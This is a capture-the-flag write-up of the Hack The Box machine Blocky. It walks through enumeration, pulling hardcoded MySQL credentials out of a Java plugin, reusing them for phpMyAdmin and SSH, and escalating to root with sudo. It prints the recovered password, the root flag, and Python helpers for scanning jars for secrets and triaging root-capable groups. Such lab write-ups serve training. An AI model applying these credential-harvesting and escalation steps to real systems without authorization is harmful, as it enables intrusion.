This post documents my process for solving the Blocky box on Hack The Box. The machine revolves around web enumeration, WordPress, reverse engineering a Java plugin, MySQL credential hunting, and privilege escalation.
Reference
https://0xdf.gitlab.io/2020/06/30/htb-blocky.html
Recon
Nmap
nmap -sC -sV 10.10.10.37
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18
8192/tcp closed sophos
Notes:
- Port 80 redirects to http://blocky.htb (add it to /etc/hosts)
- Exposed services: FTP (ProFTPD 1.3.5a), SSH, Apache serving WordPress; MySQL is not listed in the scan and was only reached later through phpMyAdmin on the web server
Technologies
- WordPress 4.8
- PHP
- MySQL
Feroxbuster
feroxbuster -u http://blocky.htb
- Found various WordPress and plugin directories
- Directory listings enabled in some locations
There is also a comment section, possibly for XSS testing.
Attacks & Enumeration
- The comment section did not have XSS
- No SQL injection
- No FTP exploit (anonymous login failed, exploit-db checks failed)
- Inspected the jar files listed under /plugins
- Ran strings on the custom plugin and found hardcoded credentials
- Used
Java Plugin Analysis
Reverse engineering the BlockyCore.class file revealed:

package com.myfirstplugin;

public class BlockyCore {
    // Database settings compiled in as plain string constants
    public String sqlHost = "localhost";
    public String sqlUser = "root";
    public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

    public void onServerStart() {}
    public void onServerStop() {}

    public void onPlayerJoin() {
        sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
    }

    public void sendMessage(String username, String message) {}
}
The sqlUser and sqlPass values are hardcoded in the plugin, and sqlHost is localhost, which matches the scan (MySQL is not reachable directly). I used these credentials to log in to phpMyAdmin.
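Running strings over a jar works, but it buries the interesting values among thousands of class names and method descriptors. The following is an added example, not code from the writeup: a Python scanner that unzips each jar, parses the JVM constant pool of every .class file, and reports only the string literals the code actually uses (CONSTANT_String entries) plus any identifiers that look credential-related. Because no real jar is available offline, the script builds a constructed stand-in class file with the same identifiers and literals seen in BlockyCore above; the credential heuristics (name keywords, mixed-case-plus-digit literals) are the editor's own assumptions and will need tuning on other targets.

```python
import re
import struct
import tempfile
import zipfile
from pathlib import Path

# Byte widths of fixed-size constant pool entries (JVM spec 4.4); Utf8 (tag 1) is variable.
CP_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
            12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
# Assumed keyword list for credential-looking identifiers (editor's heuristic).
SECRET_NAME = re.compile(r"pass|pwd|secret|token|cred|apikey", re.I)


def parse_constant_pool(data: bytes) -> dict:
    """Map constant-pool index -> (tag, value). Only Utf8 (str) and String
    (index of its Utf8) carry a value; other entries are skipped by size."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    (count,) = struct.unpack(">H", data[8:10])
    pool, pos, idx = {}, 10, 1
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            (length,) = struct.unpack(">H", data[pos:pos + 2])
            pool[idx] = (1, data[pos + 2:pos + 2 + length].decode("utf-8", "replace"))
            pos += 2 + length
        elif tag == 8:
            pool[idx] = (8, struct.unpack(">H", data[pos:pos + 2])[0])
            pos += 2
        elif tag in CP_FIXED:
            pool[idx] = (tag, None)
            pos += CP_FIXED[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {pos - 1}")
        idx += 2 if tag in (5, 6) else 1  # Long and Double occupy two slots
    return pool


def string_literals(data: bytes) -> list:
    """Strings used as values in the code, not class names or descriptors."""
    pool = parse_constant_pool(data)
    return [pool[ref][1] for tag, ref in pool.values()
            if tag == 8 and pool.get(ref, (0, None))[0] == 1]


def credential_hints(data: bytes) -> tuple:
    """Credential-looking identifiers, and literals that look like generated
    secrets (>= 8 chars, upper + lower + digit, no spaces). Heuristic only."""
    pool = parse_constant_pool(data)
    names = sorted({v for t, v in pool.values()
                    if t == 1 and v.isidentifier() and SECRET_NAME.search(v)})
    literals = [s for s in string_literals(data)
                if len(s) >= 8 and " " not in s and re.search(r"[A-Z]", s)
                and re.search(r"[a-z]", s) and re.search(r"\d", s)]
    return names, literals


def scan_jar(path) -> dict:
    """{class entry name: (suspicious identifiers, suspicious literals)} for one jar."""
    findings = {}
    with zipfile.ZipFile(path) as zf:
        for name in zf.namelist():
            if name.endswith(".class"):
                names, literals = credential_hints(zf.read(name))
                if names or literals:
                    findings[name] = (names, literals)
    return findings


def build_sample_class(identifiers, literals) -> bytes:
    """Constructed stand-in for javac output: a valid constant pool plus padding.
    Not the real BlockyCore.class, just enough for the parser above."""
    entries, next_idx = [], 1
    for ident in identifiers:
        entries.append(b"\x01" + struct.pack(">H", len(ident)) + ident.encode())
        next_idx += 1
    entries.append(b"\x05" + struct.pack(">q", 1234567890))  # a Long: two slots
    next_idx += 2
    for lit in literals:
        utf8_idx = next_idx
        entries.append(b"\x01" + struct.pack(">H", len(lit)) + lit.encode())
        entries.append(b"\x08" + struct.pack(">H", utf8_idx))  # String -> its Utf8
        next_idx += 2
    header = b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, next_idx)
    return header + b"".join(entries) + b"\x00" * 8


def demo() -> dict:
    """Write a constructed plugin jar to a temp dir and scan it."""
    cls = build_sample_class(
        ["com/myfirstplugin/BlockyCore", "sqlHost", "sqlUser", "sqlPass",
         "Ljava/lang/String;", "onServerStart", "sendMessage"],
        ["localhost", "root", "8YsqfCTnvxAUeduzjNSXe22",
         "Welcome to the BlockyCraft!!!!!!!", "TODO get username"])
    with tempfile.TemporaryDirectory() as tmp:
        jar = Path(tmp) / "BlockyCore.jar"
        with zipfile.ZipFile(jar, "w") as zf:
            zf.writestr("com/myfirstplugin/BlockyCore.class", cls)
            zf.writestr("plugin.yml", "name: BlockyCore\n")
        return scan_jar(jar)


if __name__ == "__main__":
    for cls_name, (names, lits) in demo().items():
        print(cls_name, "identifiers:", names, "literals:", lits)
```

On a real target, point scan_jar at each file pulled from the /plugins listing; the field name sqlPass surfaces as an identifier hint and the password surfaces as a literal, while the descriptors and method names that clutter strings output are dropped.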
Exploitation
- Could not SSH using the same creds
- Used creds to log in to phpMyAdmin
- Verified users and privileges
phpMyAdmin showed these MySQL users:
- debian-sys-maint
- mysql.sys
- phpmyadmin
- root
- wordpress
Privilege Escalation
In the wp_users table, I found the user Notch. I tried the MySQL password for SSH with the notch username:
ssh notch@blocky.htb
Successful login! The id command showed that notch is in several privileged groups, including sudo.
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Beyond sudo, membership in lxd (gid 110) is itself a well-known route to root on Ubuntu, so notch would have had a second path even if sudo had been locked down. Checking with sudo -l showed notch can run any command as root:
notch@Blocky:~$ sudo -l
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
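The id and sudo -l output above contains more than one path to root, and it is easy to stop reading at the first one. As an added example (not part of the writeup), here is a small Python triage helper that parses id output into structured groups, flags the ones known to lead to root, and parses sudo -l rule lines into runas user, tags such as NOPASSWD, and commands. The sample inputs are the two outputs from this box; the group-to-risk table is the editor's own assumption and should be tuned per target.

```python
import re

# Groups that commonly give a path to root on Ubuntu-style hosts. Assumed table
# (editor's knowledge, not from the writeup); extend it for the target at hand.
RISKY_GROUPS = {
    "sudo": "may run commands as root (check sudo -l)",
    "admin": "legacy sudo group on older Ubuntu",
    "lxd": "can launch a privileged LXD container that mounts the host root filesystem",
    "docker": "can start a container with the host filesystem mounted",
    "disk": "raw read access to block devices, e.g. /etc/shadow via debugfs",
    "shadow": "can read /etc/shadow password hashes",
    "adm": "can read /var/log, which often leaks credentials",
}

# Sample inputs: the id and sudo -l output captured on Blocky above.
ID_LINE = ("uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),"
           "27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)")
SUDO_OUT = "User notch may run the following commands on Blocky:\n    (ALL : ALL) ALL\n"

ID_RE = re.compile(r"(\d+)\(([^)]+)\)")
# Rule line: "(runas_user [: runas_group]) [TAG: ...] cmd1, cmd2"
SUDO_RE = re.compile(r"^\s*\((?P<user>[^:)]+)(?::(?P<group>[^)]+))?\)\s*"
                     r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_id(output: str) -> dict:
    """Parse `id` output into uid, gid and a list of (gid, name) groups."""
    fields = dict(part.split("=", 1) for part in output.strip().split())
    to_pair = lambda m: (int(m[0]), m[1])
    return {
        "uid": to_pair(ID_RE.match(fields["uid"]).groups()),
        "gid": to_pair(ID_RE.match(fields["gid"]).groups()),
        "groups": [to_pair(g) for g in ID_RE.findall(fields.get("groups", ""))],
    }


def risky_groups(output: str) -> dict:
    """{group name: why it matters} for every risky group the user is in."""
    return {name: RISKY_GROUPS[name]
            for _, name in parse_id(output)["groups"] if name in RISKY_GROUPS}


def parse_sudo_l(output: str) -> list:
    """Parse the rule lines of `sudo -l`; header and Defaults lines are skipped."""
    rules = []
    for line in output.splitlines():
        m = SUDO_RE.match(line)
        if not m:
            continue
        rules.append({
            "runas_user": m.group("user").strip(),
            "runas_group": (m.group("group") or "").strip() or None,
            "tags": [t.strip() for t in m.group("tags").split(":") if t.strip()],
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def can_root(rules: list) -> bool:
    """True when some rule allows running any command as root (or as anyone)."""
    return any(r["runas_user"] in ("ALL", "root") and "ALL" in r["commands"] for r in rules)


if __name__ == "__main__":
    for name, why in risky_groups(ID_LINE).items():
        print(f"group {name}: {why}")
    rules = parse_sudo_l(SUDO_OUT)
    print("sudo rules:", rules, "-> full root:", can_root(rules))
```

For notch this reports adm, sudo and lxd; the sudo rule is the quickest path, but the lxd hit is the one to remember on hosts where the account is not a sudoer.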
Used sudo su
to get a root shell:
notch@Blocky:~$ sudo su
root@Blocky:/home/notch# ls
minecraft user.txt
root@Blocky:/home/notch# cd /root
root@Blocky:~# ls
root.txt
root@Blocky:~# cat root.txt
3cf136f494e9bb904fcd902d52f803cc
Lessons Learned
- Always enumerate and inspect all plugins/files; reverse engineering can reveal hardcoded secrets.
- Directory listings in WordPress installations can leak important files.
- Credentials are often reused across services—try them everywhere!
- Privilege escalation is sometimes as simple as landing on an account that already holds full sudo rights; here the root cause was password reuse rather than a broken sudoers file, so check sudo -l and group membership (sudo, lxd, docker) as soon as you have a shell.
- Checking users in the application database can uncover valid system usernames.
Writeup based on my own exploitation process, with inspiration from HTB community writeups.